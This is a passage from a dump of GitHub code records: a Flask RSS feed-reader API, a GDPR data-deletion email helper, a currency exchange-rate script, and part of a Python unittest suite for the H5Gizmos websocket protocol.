= feed[\"summary\"]\n soup = BeautifulSoup(summary_raw, \"html5lib\")\n summary = soup.get_text() # Strip html from summary\n \n date = datetime.strptime(feed[\"date\"], \"%a, %d %b %Y %H:%M:%S %z\")\n LOCAL_TIMEZONE = datetime.now(dt.timezone.utc).astimezone().tzinfo\n date = date.astimezone(LOCAL_TIMEZONE)\n date_str = date.strftime('%a %d %b')\n time_str = date.strftime(\"%H:%M\")\n\n if(date_str == prev_date_str):\n date_time_str = ''\n else:\n date_time_str = date.strftime('%a %d %b')\n\n prev_date_str = date_str\n\n source = feed[\"source\"]\n if source == prev_source:\n if not date_time_str:\n source = ''\n else:\n prev_source = source\n \n feed['summary'] = summary\n feed['time_str'] = time_str\n feed['date_time_str'] = date_time_str\n\n return feeds\n\n@app.route('/')\ndef simple_web_page(): \n response = ''\n try:\n feeds = feed_reader.get_stored_feeds(loop)\n\n feed_url_group = request.args.get('feed_url_group', '')\n if feed_url_group is not None:\n feed_urls = feed_reader.get_feed_urls(loop, feed_url_group)\n feeds = feed_reader.limit_feeds_to_group(loop, feeds, feed_urls)\n\n print('-- feeds --')\n print(feeds)\n print('-- ---- --')\n feeds = process_feeds(feeds)\n response = render_template('feeds.html', feeds=feeds) \n except Exception as e:\n msg = 'Sorry, feeds cannot be loaded at the moment.'\n details = 'Please try again later.'\n response = render_template('error.html', msg=msg, details=details)\n return response\n\n@app.route('/api/feed')\ndef feed_json():\n reload = request.args.get('reload')\n feed_url_group = request.args.get('feed_url_group', '')\n\n if reload:\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n feeds, feed_info = feed_reader.get_all_feeds(loop, feed_url_groups)\n feed_reader.store_feeds(feeds)\n feed_reader.store_feed_info(feed_info)\n else:\n feeds = feed_reader.get_stored_feeds(loop)\n\n if feed_url_group is not None:\n feed_urls = feed_reader.get_feed_urls(loop, feed_url_group)\n feeds = feed_reader.limit_feeds_to_group(loop, feeds, feed_urls)\n\n response = jsonify(feeds)\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response\n\n@app.route('/api/feed_groups', methods=['GET', 'POST'])\ndef feed_groups():\n \"\"\"API endpoint for managing named groups of feed urls.\n \n GET returns the group info minus the feeds\n\n POST is used to clone an existing feed url group. It is only possible\n to clone to a group that doesn't already exist.\n\n params:\n feed_url_group - The group to clone\n new_group_name - The new group name to clone to\n \"\"\"\n status = 200\n success = True\n reason = 'ok'\n resp = {}\n\n user = auth.username()\n\n if request.method == 'GET':\n get_selected_groups = request.args.get('get_selected_groups', False)\n\n if get_selected_groups:\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n \n group_info = {}\n\n for group in feed_reader.selected_groups:\n if group in feed_url_groups:\n group_info[group] = feed_url_groups[group]\n if feed_reader.is_locked_group(group) and not feed_reader.is_locker(user):\n group_info[group]['locked'] = True\n else:\n group_info[group]['locked'] = False\n else:\n feed_url_group = request.args.get('feed_url_group', '')\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n group_info = feed_url_groups.get(feed_url_group)\n\n if group_info:\n feeds = group_info['feeds']\n feed_info = feed_reader.get_feed_info(loop)\n group_info['feed_info'] = feed_info\n\n if feed_reader.is_locked_group(feed_url_group) and not feed_reader.is_locker(user):\n group_info['locked'] = True\n else:\n group_info['locked'] = False\n else:\n success = False\n status = 400\n reason = 'url-group-does-not-exist'\n\n elif request.method == 'POST':\n body = request.json\n\n feed_url_group = body.get('feed_url_group', '').strip()\n feed_url_groups = feed_reader.get_feed_url_groups(loop)\n group_info = feed_url_groups.get(feed_url_group)\n\n new_group_name = body.get('new_group_name', '').strip()\n new_group_exists = new_group_name in feed_url_groups\n new_group_is_locked = feed_reader.is_locked_group(new_group_name) and not feed_reader.is_locker(user)\n\n if not feed_reader.is_valid_group_name(new_group_name):\n success = False\n status = 400\n reason = 'group-name-is-invalid'\n elif new_group_exists:\n success = False\n status = 400\n reason = 'new-url-group-already-exists'\n elif new_group_is_locked:\n success = False\n status = 400\n reason = 'new-url-group-is-locked'\n else:\n group_info, success, reason = feed_reader.clone_group(feed_url_groups, \n feed_url_group, \n new_group_name)\n\n response = jsonify({'success': success, 'reason': reason, 'data': group_info})\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response, status\n\n@app.route('/api/feed_urls', methods=['GET', 'POST', 'DELETE'])\ndef feed_urls():\n \"\"\"API endpoint for managing list of feed urls.\n\n Takes a feed_url_group string to determine which group to add the feed to.\n\n Returns json in format: {\n 'success': true/false,\n 'reason': string,\n 'data': [string, string, ...]\n }\n\n GET reason: ok\n POST reason: ok, no-data-from-feed, url-exists, max-feeds-10, timeout, url-group-does-not-exist\n DELETE reason: ok, url-does-not-exist, url-group-does-not-exist\n \"\"\"\n status = 200\n success = True\n reason = 'ok'\n resp = {}\n\n user = auth.username()\n\n if request.method == 'GET':\n feed_url_group = request.args.get('feed_url_group', '').strip()\n resp = feed_reader.get_feed_urls(loop, feed_url_group)\n elif request.method == 'POST':\n body = request.json\n feed_url = body['feed_url']\n feed_url_group = body.get('feed_url_group', '').strip()\n\n if not feed_reader.is_valid_group_name(feed_url_group):\n success = False\n status = 400\n reason = 'group-name-is-invalid'\n else:\n feed, feed_infos, success, reason = feed_reader.add_feed_url(loop, feed_url, feed_url_group, user)\n\n resp['feeds'] = feed\n resp['feed_info'] = feed_infos\n\n if success:\n status = 201\n else:\n status = 400\n\n elif request.method == 'DELETE':\n body = request.json\n feed_url = body['feed_url']\n feed_url_group = body.get('feed_url_group', '')\n resp, success, reason = feed_reader.delete_feed_url(loop, feed_url, feed_url_group, user)\n \n if not success:\n status = 400\n\n response = jsonify({'success': success, 'reason': reason, 'data': resp})\n response.headers.add('Access-Control-Allow-Origin', '*')\n return response, status\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"ben-razor/birdfeed","sub_path":"web_py/feed_web.py","file_name":"feed_web.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16775955771","text":"#!/usr/bin/env python\nimport json\nimport urllib\nimport urllib.parse\n\nTYPE_JOB_WEBSITE = \"job website\"\nTYPE_RECRUITER = \"recruiter\"\n\n# set company names as exclusions - those you don't want to contact\nexclusions = []\n\ncompanies = {\n\t\"cwjobs\": {\n\t\t\"type\": TYPE_JOB_WEBSITE,\n\t\t\"website\": \"https://www.cwjobs.co.uk\",\n\t\t\"data_controller\": \"Totaljobs\",\n\t\t\"email\": \"dataprotectionofficerUK@stepstone.co.uk\"\n\t},\n\t\"modis\": {\n\t\t\"type\": TYPE_RECRUITER,\n\t\t\"email\": \"privacy@modis.co.uk\"\n\t},\n\t\"reed\": {\n\t\t\"type\": TYPE_JOB_WEBSITE,\n\t\t\"website\": \"https://www.reed.co.uk\",\n\t\t\"email\": \"dpo@reedonline.co.uk\"\n\t}\n}\n\n################################################################################\n\npersonal_data = json.load(open(\".personal-data.json\"))\nprint(personal_data)\n\nemail_bccs = []\nfor company in companies:\n\tif company in exclusions:\n\t\tprint(\"Company %s excluded, skipping\" % company)\n\t\tcontinue\n\tprint(company)\n\temail_bccs.append(companies[company][\"email\"])\n\nprint(email_bccs)\nemail_bccs_string = ','.join(email_bccs)\n\nbody = urllib.parse.quote_plus(f\"\"\"{personal_data[\"full_name\"]}, {personal_data[\"address\"]}\n\nPlease delete any data you hold for me.\nFurther to this, please let me know any other parties you may have shared my data with in the last three months.\nIf possible I would also appreciate if you contacted them on my behalf, asking them to delete my data.\n\nThanks,\n{personal_data[\"full_name\"]}\n\"\"\")\nsubject = urllib.parse.quote_plus(\"Personal data deletion\")\nto_address = personal_data[\"email\"]\nprint(f'https://mail.google.com/mail/?view=cm&fs=1&to={to_address}&bcc={email_bccs_string}&su={subject}&body={body}')\n","repo_name":"james-portman/personal-data-deletion","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24428933141","text":"import requests\nfrom datetime import date, datetime, timedelta\nimport time\n# HEADERS = {'user-agents': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36', 'accept': '*/*'}\n\n# url = 'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json'\n# valcode = str(input('Currency you need: '))\n# url = str(f'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?valcode={valcode}&json')\n\n\n# def cur(cc):\n# response = requests.get(url)\n# resp_data = response.json()\n# n = len(resp_data)\n# temp = []\n# result = 'none'\n# for i in range(0, n):\n# temp = resp_data[i]\n# cc_val = temp.get('cc')\n# if cc_val.lower() == cc.lower():\n# result = temp.get('txt')\n# break\n# return result\nBASE_URL = f'https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?'\n\ndef timer(func):\n def wrapper(*args):\n start = time.time()\n print('start time', start)\n target = func(*args)\n end = time.time()\n print('end time', end)\n print('timer.Function execution time in seconds:', round(end - start, 6))\n print('timer.Function executed')\n print(func(*args))\n\n return wrapper\n\n\n@timer\ndef exchange(cur):\n url = str(f'{BASE_URL}valcode={cur}&json')\n resp = requests.get(url).json()[0]\n return resp['cc'], resp['txt'], resp['rate'],resp['exchangedate']\n\ndef exchange(cur):\n url = str(f'{BASE_URL}valcode={cur}&json')\n resp = requests.get(url).json()[0]\n result = resp['cc'], resp['txt'], resp['rate']\n return result\n\nprint(exchange('usd'))\n\n\n# yyyymmdd, де yyyy - рік, mm - місяць, dd - день\n\n# def cur_7(c):\n# today = date.today()\n# minus_day = timedelta(days=+1)\n# result = []\n# result.append(str(today).replace('-', ''))\n# for i in range(7):\n# today = today-minus_day\n# result.append(str(today).replace('-', ''))\n\n\n# def cur_7(cc, days = 7):\n# today = date.today()\n# minus_day = timedelta(days=-1)\n# result = []\n# result.append(str(today).replace('-', ''))\n# for i in range(days-1):\n# today +=minus_day\n# result.append(str(today).replace('-', ''))\n# fin=[]\n# for j in result:\n# url = str(f'{BASE_URL}valcode={cc}&date={j}&json')\n# resp = requests.get(url).json()[0]\n# fin.append(resp)\n# print(fin)\n# return fin\n# for f in range(1, days+1):\n# print(f\"{fin[-f]['exchangedate']} ** {fin[-f]['cc']} ({fin[-f]['txt']}) ** {fin[-f]['rate']}\")\n\n#\n# def cur_all_data():\n# response = requests.get(f'{BASE_URL}json').json()\n# result =''\n# for i in range(len(response)):\n# result+= f\"{response[i]['cc']} >>> {response[i]['txt']} >>> {response[i]['rate']}\\n\"\n# return result\n#\n#\n# print(cur_all_data())\n\n#\n# print(today)\n# date=20200522\n# def exchange(cur):\n# url = str(f'{BASE_URL}valcode={cur}&date={date}&json')\n# resp = requests.get(url).json()[0]\n# return resp['cc'], resp['txt'], resp['rate'],resp['exchangedate']\n#\n# print(exchange('usd'))\n\n# https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?valcode=EUR&date=20200302&json\n\n# print(url)\n# rate = (dict(response.json()[0]))\n# print(rate.get('rate', 'No value found'))\n\n\n\n# if response:\n# print('Success!')\n# else:\n# print('Not Found.')\n#\n# # status code\n# print(response.status_code)\n#\n# # content\n# print(response.content)\n#\n# # text\n# print(response.text)\n#\n# # json\n# print(response.json())\n#\n# # headers\n# print(response.headers)\n# print(response.headers['Content-Type'])\n#\n# # Content-Type\n# print(response.headers['Content-Type'])\n#\n# https://bank.gov.ua/NBUStatService/v1/statdirectory/exchange?json\n#\n# rate = (dict(response.json()[0]))\n# print(rate)\n# print(rate.get('rate', 'No value found'))\n# print(rate.get('cc', 'No value found'))\n# print(rate.get('exchangedate'))","repo_name":"agornovych/study_python","sub_path":"Requests.py","file_name":"Requests.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42028984378","text":"\n\n# Requires python 3.8\n# Run from setup folder:\n# nosetests --with-coverage --cover-html --cover-package=H5Gizmos --cover-erase --cover-inclusive\n\nimport unittest\n\nimport numpy as np\nimport json\n\nfrom H5Gizmos.python.gz_parent_protocol import (\n Gizmo, \n GZ,\n GizmoLiteral,\n JavascriptEvalException,\n NoSuchCallback,\n GizmoLink,\n GizmoReference,\n CantConvertValue,\n NoRequestForOid,\n BadResponseFormat,\n GizmoPacker,\n FINISHED_UNICODE,\n CONTINUE_UNICODE,\n BadMessageIndicator,\n JsonCodec,\n GZPipeline,\n schedule_task,\n TooManyRequests,\n ValueConverter,\n)\n\n'''\nclass TestFails(unittest.TestCase):\n\n def test_fail(self):\n self.assertEqual(1, 0)\n'''\n\ndef dummy_request(id=\"1234\"):\n \"fake web socket request interface to make tests work.\"\n class url:\n query = {Gizmo.RECONNECT_ID: id}\n class request:\n _rel_url = url\n return request\n\nclass GizmoWrapper:\n\n def __init__(self, default_depth=5):\n self.sent_data = []\n self.G = Gizmo(self.send, default_depth)\n\n def send(self, object):\n self.sent_data.append(object)\n\ndef _lit(json_ob):\n return [GZ.LITERAL, json_ob]\n\ndef _call(callable_cmd, args):\n return [GZ.CALL, callable_cmd, args]\n\ndef _ref(identity):\n return [GZ.REFERENCE, identity]\n\ndef _get(target_cmd, index_cmd):\n return [GZ.GET, target_cmd, index_cmd]\n\ndef _seq(cmds):\n return [GZ.SEQUENCE, cmds]\n\ndef _map(mapping):\n return [GZ.MAP, mapping]\n\ndef _callback(oid, to_depth):\n return [GZ.CALLBACK, oid, to_depth]\n\ndef _bytes(hex):\n return [GZ.BYTES, hex]\n\ndef get_msg(oid, cmd, to_depth):\n return [GZ.GET, oid, cmd, to_depth]\n\ndef exec_msg(cmd):\n return [GZ.EXEC, cmd]\n\ndef connect_msg(id, cmd):\n return [GZ.CONNECT, id, cmd]\n\ndef disconnect_msg(id):\n return [GZ.DISCONNECT, id]\n\nclass FakeWebSocketResponse:\n\n _prepared = False\n _sent = None\n _closed = False\n\n def __init__(self):\n ##p(\"init\", self)\n #self._messages = messages\n #if messages:\n # raise ValueError(\"please use append\", messages)\n self._messages = []\n self._index = 0\n #p(\"init\", self)\n\n def __repr__(self) -> str:\n return \"resp\" + repr([self._index, self._messages])\n\n def append(self, msg):\n #p(\"append\", self, msg)\n self._messages.append(msg)\n\n def __aiter__(self):\n #p(\"in aiter\", self)\n return self\n\n async def __anext__(self):\n #p(\"in anext\", self)\n i = self._index\n self._index += 1\n msgs = self._messages\n if i >= len(msgs):\n #p(\"stopping\", self)\n raise StopAsyncIteration\n result = msgs[i]\n #p(\"anext=\", result)\n return result\n\n async def prepare(self, request):\n self._prepared = True\n self._request = request\n self._sent = []\n\n async def send_str(self, unicode_str):\n self._sent.append(unicode_str)\n\n async def drain(self, *arguments):\n pass # do nothing\n\nclass FakeWebSocketConnection:\n\n def __init__(self, messages_to_send):\n ws = FakeWebSocketResponse()\n self.ws = ws\n for message in messages_to_send:\n ws.append(message)\n\n def get_web_socket(self):\n return self.ws\n\nclass FakeWebSocketMessage:\n\n def __init__(self, typ, data):\n self.type = typ\n self.data = data\n\n def __repr__(self):\n return \"msg\" + repr((self.type, self.data))\n\ndef FakeWebSocketUnicodeMessages(unicode_strings, msg_type=GZPipeline.MSG_TYPE_TEXT):\n messages = []\n for ustr in unicode_strings:\n msg = FakeWebSocketMessage(msg_type, ustr)\n messages.append(msg)\n cnx = FakeWebSocketConnection(messages)\n return cnx\n\nclass TestGizmo(unittest.TestCase):\n\n def test_converts_None_in_dict(self):\n import numpy as np\n D = dict(key=None)\n converted = ValueConverter(D, None)\n assert converted.is_literal\n DC = converted.command._value\n self.assertEqual(DC, D)\n\n def test_converts_float32_in_dict(self):\n import numpy as np\n a = np.array([42.3], dtype=np.float32)\n D = dict(key=a[0])\n self.assertEqual(type(D[\"key\"]), np.float32)\n converted = ValueConverter(D, None)\n assert converted.is_literal\n DC = converted.command._value\n self.assertEqual(type(DC[\"key\"]), float)\n\n def test_converts_float32_in_list(self):\n import numpy as np\n a = np.array([42.3], dtype=np.float32)\n L = [a[0]]\n self.assertEqual(type(L[0]), np.float32)\n converted = ValueConverter(L, None)\n assert converted.is_literal\n LC = converted.command._value\n self.assertEqual(type(LC[0]), float)\n\n def test_calls_callback(self):\n data = []\n def callback_function(*args):\n data.append(args)\n GW = GizmoWrapper()\n G = GW.G\n oid = G._register_callback(callback_function)\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n G._receive(json_msg)\n self.assertEqual(data, [tuple(arguments)])\n\n def test_no_such_callback(self):\n data = []\n def callback_function(*args):\n data.append(args)\n GW = GizmoWrapper()\n G = GW.G\n oid = G._register_callback(callback_function)\n oid = \"nope:\" + oid # make an invalid oid\n arguments = [\"this\", \"argument\", \"list\"]\n json_msg = [GZ.CALLBACK, oid, arguments]\n with self.assertRaises(NoSuchCallback):\n G._receive(json_msg)\n self.assertEqual(data, [tuple(arguments)])\n\n def test_ref_attr_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someObject\", G)\n getatr = ref.attribute\n getatr._exec()\n expected = exec_msg(_get(_ref(\"someObject\"), _lit(\"attribute\")))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_item_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someObject\", G)\n getatr = ref[\"attribute\"]\n getatr._exec()\n expected = exec_msg(_get(_ref(\"someObject\"), _lit(\"attribute\")))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_request(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", 1)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(1)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_list_literal(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n the_list = [1, \"two\"]\n call = ref(\"abc\", the_list)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(the_list)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_dict_literal(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n the_dict = {\"hello\": \"world\"}\n call = ref(\"abc\", the_dict)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), _lit(the_dict)]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_list_ref(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n ref2 = GizmoReference(\"someObject\", G)\n the_list = [1, ref2]\n the_list_cmd = _seq([_lit(1), _ref(\"someObject\")])\n call = ref(\"abc\", the_list)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), the_list_cmd]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_ref_call_with_dict_ref(self):\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n ref2 = GizmoReference(\"someObject\", G)\n the_dict = {\"hello\": ref2}\n the_dict_cmd = _map({\"hello\": _ref(\"someObject\")})\n call = ref(\"abc\", the_dict)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), the_dict_cmd]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_execs_literal(self, detail=False):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n lit._exec(detail)\n expected = exec_msg(_lit(json_ob))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_exec_literal_detail(self):\n return self.test_execs_literal(detail=True)\n\n def test_requests_connection(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n identifier = \"window\"\n cnx = lit._connect(identifier)\n expected = connect_msg(identifier, _lit(json_ob))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_requests_connection_then_disconnect(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"json\", None]\n lit = GizmoLiteral(json_ob, G)\n identifier = \"window\"\n cnx = lit._connect(identifier)\n expected_connect = connect_msg(identifier, _lit(json_ob))\n cnx._disconnect()\n expected_disconnect = disconnect_msg(identifier)\n self.assertEqual(GW.sent_data, [expected_connect, expected_disconnect])\n\n def test_raises_not_implemented(self):\n X = GizmoLink()\n with self.assertRaises(NotImplementedError):\n X._command(to_depth=10)\n with self.assertRaises(NotImplementedError):\n X._get_id()\n\n def test_wraps_callable(self):\n def example_callable(x):\n return x + 1\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_callable)\n call._exec()\n #self.assertEqual(G._callable_to_oid, None)\n oid = G._callable_to_oid[example_callable]\n cb_json = _callback(oid, G._default_depth)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), cb_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_converts_bytes(self):\n example_bytes = bytearray([1,2,3])\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_bytes)\n call._exec()\n hex = \"010203\"\n bytes_json = _bytes(hex)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), bytes_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_converts_array(self):\n L = [100, 200, 300]\n example_array = np.array(L)\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n call = ref(\"abc\", example_array)\n call._exec()\n hex = \"010203\"\n array_json = _lit(L)\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\"), array_json]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_unconvertible(self):\n cant_convert = np\n GW = GizmoWrapper()\n G = GW.G\n ref = GizmoReference(\"someFunction\", G)\n with self.assertRaises(CantConvertValue):\n call = ref(\"abc\", cant_convert)\n call._exec()\n expected = exec_msg(_call(_ref(\"someFunction\"), [_lit(\"abc\")]))\n self.assertEqual(GW.sent_data, [expected])\n\n def test_no_request_for_oid(self):\n GW = GizmoWrapper()\n G = GW.G\n oid = \"oid123_doesn't exist\"\n json_ob = [1, \"two\", 3]\n get_response = [GZ.GET, oid, json_ob]\n with self.assertRaises(NoRequestForOid):\n G._receive(get_response)\n\n def test_dont_receive_maps(self):\n GW = GizmoWrapper()\n G = GW.G\n get_response = {\"a\": \"mapping\"}\n with self.assertRaises(BadResponseFormat):\n G._receive(get_response)\n\n def test_bad_indicator(self):\n GW = GizmoWrapper()\n G = GW.G\n get_response = [\"nonsense\", \"reply\"]\n with self.assertRaises(BadResponseFormat):\n G._receive(get_response)\n\n def test_receive_chunks(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 1000000\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n P.on_unicode_message(CONTINUE_UNICODE + \"abc\")\n P.on_unicode_message(FINISHED_UNICODE + \"123\")\n self.assertEqual(packets_processed, ['abc123'])\n\n def test_rejects_bad_chunks(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 1000000\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n with self.assertRaises(BadMessageIndicator):\n P.on_unicode_message(\"*\" + \"abc\")\n self.assertEqual(packets_processed, [])\n\n def test_processes_json_string(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n expected = [\"this\", 1, \"json\"]\n jstring = '[\"this\", 1, \"json\"]'\n codec.receive_unicode(jstring)\n self.assertEqual(processed_json, [expected])\n\n def test_rejects_bad_json_string(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n jstring = '[\"this\", 1, \"json]'\n with self.assertRaises(Exception):\n codec.receive_unicode(jstring)\n self.assertEqual(len(errors), 1)\n\n def test_encodes_json_object(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n json_ob = [\"this\", 1, \"json\"]\n codec.send_json(json_ob)\n self.assertEqual(len(sent_unicode), 1)\n [ustr] = sent_unicode\n parsed = json.loads(ustr)\n self.assertEqual(parsed, json_ob)\n\n def test_rejects_bad_json_object(self):\n processed_json = []\n def process_json(json_ob):\n processed_json.append(json_ob)\n sent_unicode = []\n def send_unicode(x):\n sent_unicode.append(x)\n errors = []\n def on_error(msg):\n errors.append(msg)\n codec = JsonCodec(process_json, send_unicode, on_error)\n json_ob = [\"this\", 1, \"json\", json]\n with self.assertRaises(Exception):\n codec.send_json(json_ob)\n self.assertEqual(len(errors), 1)\n\nclass TestGizmoAsync(unittest.IsolatedAsyncioTestCase):\n\n async def test_resolves_get(self):\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n to_depth = 5\n # pass in the future so we can resolve it in the test case...\n (oid, future) = G._register_future()\n awaitable = lit._get(to_depth, oid=oid, future=future)\n # emulate a resolving send from JS side\n get_response = [GZ.GET, oid, json_ob]\n G._receive(get_response)\n # future should be resolved\n self.assertTrue(future.done())\n result = await awaitable\n self.assertEqual(result, json_ob)\n\n async def test_get_exception(self):\n GW = GizmoWrapper()\n G = GW.G\n exception_data = []\n def on_exception(payload):\n exception_data.append(payload)\n G._on_exception = on_exception\n json_ob = [1, \"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n to_depth = 5\n # pass in the future so we can resolve it in the test case...\n (oid, future) = G._register_future()\n awaitable = lit._get(to_depth, oid=oid, future=future)\n # emulate an exception from JS side\n get_response = [GZ.EXCEPTION, \"Fake exception\", oid]\n G._receive(get_response)\n # future should be resolved\n self.assertTrue(future.done())\n # awaitable should raise an error\n with self.assertRaises(JavascriptEvalException):\n result = await awaitable\n self.assertEqual(result, json_ob)\n self.assertEqual(len(exception_data), 1)\n self.assertEqual(exception_data[0][0], \"Fake exception\")\n\n async def test_allocates_future_in_get(self):\n # code coverage hack\n GW = GizmoWrapper()\n G = GW.G\n json_ob = [1, \"two\", 3]\n lit = GizmoLiteral(json_ob, G)\n awaitable = lit._get(to_depth=None, oid=None, future=None, test_result=json_ob)\n result = await awaitable\n self.assertEqual(result, json_ob)\n\n async def test_auto_flushes(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n async def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 4\n auto_flush = True\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n flush_task = P.send_unicode(\"123abc\")\n expect_sends = ['C123a', 'Fbc']\n await flush_task\n self.assertEqual(strings_sent, expect_sends)\n\n async def test_manual_flushes(self):\n packets_processed = []\n def process_packet(packet):\n packets_processed.append(packet)\n strings_sent = []\n async def awaitable_sender(string):\n strings_sent.append(string)\n packet_limit = 4\n auto_flush = False\n P = GizmoPacker(process_packet, awaitable_sender, packet_limit, auto_flush)\n P.flush()\n P.send_unicode(\"123abc\")\n expect_sends = ['C123a', 'Fbc']\n await P.awaitable_flush()\n self.assertEqual(strings_sent, expect_sends)\n\n async def test_pipelines_a_message_sent(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a message to receive from JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages from JS side\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n # Send the request\n G._send(json_msg)\n # wait for the request to go through\n expect_str = FINISHED_UNICODE + json.dumps(json_msg)\n await P.packer.flush_queue_task\n ws = cnx.ws\n self.assertEqual(ws._sent, [expect_str])\n if auto_clear:\n self.assertEqual(P.last_unicode_sent, None)\n else:\n self.assertNotEqual(P.last_unicode_sent, None)\n self.assertEqual(P.last_json_received, None)\n\n async def test_one_request_per_pipeline(self, auto_clear=False):\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.auto_clear = auto_clear\n # Make a message to send to JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages from JS side\n req = dummy_request()\n # attach the web socket to the pipeline\n await P.handle_websocket_request(req, cnx.get_web_socket)\n self.assertNotEqual(P.request, None)\n req2 = dummy_request(\"different_id\")\n with self.assertRaises(TooManyRequests):\n await P.handle_websocket_request(req2, cnx.get_web_socket)\n\n async def test_pipelines_a_message_sent_early(self, auto_clear=False):\n #p(\"starging early test\")\n GW = GizmoWrapper()\n G = GW.G\n P = GZPipeline(G)\n P.set_auto_flush(True)\n P.auto_clear = auto_clear\n # Make a message to send down to JS\n json_ob = [1, \"json\", None]\n json_msg = exec_msg(_lit(json_ob))\n # Make a \"request\" for that message\n cnx = FakeWebSocketUnicodeMessages([]) # no messages 